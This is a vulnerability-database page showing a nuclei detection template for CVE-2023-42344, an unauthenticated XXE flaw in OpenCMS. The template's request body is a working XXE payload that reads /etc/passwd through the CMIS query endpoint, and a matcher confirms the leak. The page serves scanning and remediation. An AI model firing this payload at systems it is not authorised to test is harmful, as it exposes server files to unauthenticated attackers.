Lucene search
K

OpenCMS - XML external entity (XXE)

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 146 Views

OpenCMS XML external entity (XXE) vulnerability allows unauthenticated code executio

Related
Refs
Code
id: CVE-2023-42344

info:
  name: OpenCMS - XML external entity (XXE)
  author: 0xr2r
  severity: high
  description: |
    users can execute code without authentication.  An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
  impact: |
    Unauthenticated attackers can exploit XXE vulnerabilities to execute malicious requests on the OpenCMS server, potentially reading sensitive server files and internal data.
  remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
  reference:
    - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
  classification:
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: alkacon
    product: opencms
    fofa-query: "OpenCms-9.5.3"
  tags: cve,cve2023,xxe,opencms,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
      - "{{BaseURL}}/cmisatom/cmis-online/query"

    headers:
      Content-Type: "application/xml;charset=UTF-8"
      Referer: "{{RootURL}}"

    body: |
      <?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "invalidArgument"
        condition: and
# digest: 490a00463044022003729b42a3346990074b01265bb571c43e164a846fd1b88cfaeaeda0041466c3022010818590f159a5a7d570b3d5d6a7db35123605a5c93eea40d35467e4237fd387:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.17.3
EPSS0.02231
SSVC
146